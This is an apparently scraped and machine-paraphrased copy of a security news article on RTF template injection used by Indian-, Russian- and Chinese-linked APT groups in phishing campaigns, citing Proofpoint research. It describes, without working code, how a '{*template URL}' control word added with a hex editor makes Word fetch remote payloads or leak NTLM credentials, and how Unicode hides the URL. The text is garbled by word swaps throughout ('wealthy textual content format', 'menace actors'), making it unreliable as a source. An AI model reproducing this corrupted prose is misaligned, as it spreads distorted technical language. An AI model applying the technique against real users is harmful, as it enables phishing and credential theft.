154 shares, 176 points

Three APT hacking teams from India, Russia, and China, have been noticed utilizing a novel RTF (wealthy textual content format) template injection method of their current phishing campaigns.

This method is an easy but efficient methodology to retrieve malicious content material from a distant URL, and menace analysts count on it to succeed in a wider viewers of menace actors quickly.

Researchers at Proofpoint noticed the primary instances of weaponized RTF template injection in March 2021, and since then, actors have been steadily optimizing the method.

A easy methodology to fetch payloads

Rich Text Format (RTF) information are a doc format created by Microsoft that may be opened utilizing Microsoft Word, WordPad, and different purposes discovered on nearly all working methods.

When creating RTF information, you may embody an RTF Template that specifies how the textual content within the doc ought to be formatted. These templates are native information imported into an RTF viewer earlier than displaying the contents of the file to format it accurately.

While RTF Templates are supposed to be hosted regionally, menace actors at the moment are abusing this professional performance to retrieve a URL useful resource as a substitute of an area file useful resource.

This substitution permits menace actors to load malicious payloads into an utility like Microsoft Word or carry out NTLM authentication towards a distant URL to steal Windows credentials. Furthermore, as these information are transferred as RTF Templates, they’re extra apt to bypass the detection phishing lures as they aren’t initially current within the RTF information.

Creating distant RTF Templates may be very easy as all a menace actor has to do is add the {*template URL} command into an RTF file utilizing a hex editor, as proven beneath.

A URL-hiding example created by Proofpoint's researchers
A URL-hiding instance created by Proofpoint’s researchers
Source: Proofpoint

The methodology can be viable on doc.rtf information opened in Microsoft Word, forcing the app to retrieve the useful resource from the desired URL earlier than serving the content material to the sufferer, as proven beneath.

Microsoft Word retrieving the external resource
Microsoft Word retrieving the exterior useful resource
Source: Proofpoint

Cases of abuse within the wild

Proofpoint has noticed this payload retrieval methodology on phishing campaigns by the pro-Indian hacking group DoNot Team, the Russia-linked Gamaredon hacking group, and the TA423 menace actors.

A timeline of the noticed actions is proven beneath.

Timeline of activities relevant to RTF template injection
Timeline of actions related to RTF template injection
Source: Proofpoint

RTF information can parse 16-bit Unicode characters, so menace actors have been utilizing Unicode as a substitute of plaintext strings for the injected URL useful resource to evade detection.

Using Unicode to hide the URL resource
Using Unicode to cover the URL useful resource
Source: Proofpoint

However, in some samples retrieved by the DoNot Team campaigns, Proofpoint observed a failure to go Microsoft Word’s checks, leading to an error message concerning the distant supply being invalid.

Since these errors are generated earlier than the decoy content material is served to the goal, the probabilities of success for DoNot’s phishing makes an attempt drop considerably.

TA423, however, did not obfuscate the injected URLs, exchanging larger threat for detection and evaluation for error-free loading on Microsoft Word.

TA423 lure using RTF Template injection
TA423 lure utilizing RTF Template injection
Source: Proofpoint

Finally, within the case of Gamaredon, the researchers sampled RTF paperwork that impersonated Ukrainian authorities organizations to ship an MP3 file as a distant useful resource.

MP3 file fetched as an external resource
MP3 file fetched as an exterior useful resource
Source: Proofpoint

As RTF Template injections are simply completed utilizing a hex modifying software and are usually not as closely detected by antivirus scanners, they stand to turn out to be extra broadly utilized by menace actors.

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector,” defined Proofpoint of their report.

“While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”

Furthermore, because the malicious content material is retrieved from a distant URL, it permits the menace actors to dynamically modify their campaigns in real-time to make use of new payloads or totally different malicious behaviors.

To defend towards this menace, you ought to keep away from downloading and opening RTF information arriving by way of unsolicited emails, scan them with an AV scanner, and hold your Microsoft Office updated by making use of the most recent out there safety updates.

Proofpoint additionally shared YARA signatures that admins can use to detect RTF information modified to incorporate distant RTF Templates.

Like it? Share with your friends!

154 shares, 176 points

What's Your Reaction?

confused confused
lol lol
hate hate
fail fail
fun fun
geeky geeky
love love
omg omg
win win